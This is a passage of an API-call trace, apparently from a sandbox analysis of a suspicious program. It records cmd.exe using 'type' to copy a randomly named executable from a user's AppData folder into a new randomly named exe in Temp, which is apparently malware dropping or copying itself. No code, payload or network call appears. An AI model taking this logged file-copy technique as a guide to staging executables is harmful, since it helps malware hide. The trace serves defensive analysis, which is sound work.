[0094.155] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 68 [0094.155] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 71 [0094.155] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 71 [0094.155] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 80 [0094.155] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 80 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.158] GetFileType (hFile=0x7) returned 0x2 [0094.158] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0094.158] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20fbac | out: lpMode=0x20fbac) returned 1 [0094.158] _dup (_FileHandle=1) returned 3 [0094.158] _close (_FileHandle=1) returned 0 [0094.158] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe", _String2="con") returned -53 [0094.158] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\yaqb5zg8.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x20fb7c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0094.159] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0094.159] GetConsoleTitleW (in: lpConsoleTitle=0x20f9ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.159] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0094.159] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0094.159] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0094.159] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0094.160] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.160] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x20f510, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20f510) returned 0x230f58 [0094.160] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0094.160] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0094.160] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0094.160] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x20e41c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0094.161] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] GetFileType (hFile=0x54) returned 0x1 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x20e474 | out: lpFileSizeHigh=0x20e474*=0x0) returned 0x7d600 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.161] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.161] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.161] GetFileType (hFile=0x4c) 
returned 0x1 [0094.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.161] GetFileType (hFile=0x4c) returned 0x1 [0094.161] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.161] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.162] GetFileType (hFile=0x4c) returned 0x1 [0094.162] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.163] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.163] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] GetFileType (hFile=0x4c) returned 0x1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.163] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.163] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, 
lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.164] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.164] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] GetFileType (hFile=0x4c) returned 0x1 [0094.164] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.164] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.165] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.165] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] GetFileType (hFile=0x4c) returned 0x1 [0094.165] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.165] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) 
returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.166] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.166] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.166] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.166] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.167] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.167] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] GetFileType (hFile=0x4c) returned 0x1 [0094.167] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.167] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f2fc*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f34c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType 
(hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f39c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f3ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f3ec*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f43c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f43c*, lpNumberOfBytesWritten=0x20e490*=0x50, lpOverlapped=0x0) returned 1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] GetFileType (hFile=0x4c) returned 0x1 [0094.168] _get_osfhandle (_FileHandle=1) returned 0x4c [0094.168] WriteFile (in: hFile=0x4c, lpBuffer=0x20f48c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20e490, lpOverlapped=0x0 | out: lpBuffer=0x20f48c*, lpNumberOfBytesWritten=0x20e490*=0x20, lpOverlapped=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.169] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20e47c | out: lpNewFilePointer=0x0) returned 1 [0094.169] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.169] ReadFile (in: hFile=0x54, lpBuffer=0x20f2ac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20e49c, lpOverlapped=0x0 | out: lpBuffer=0x20f2ac*, lpNumberOfBytesRead=0x20e49c*=0x200, lpOverlapped=0x0) returned 1 [0094.169] 
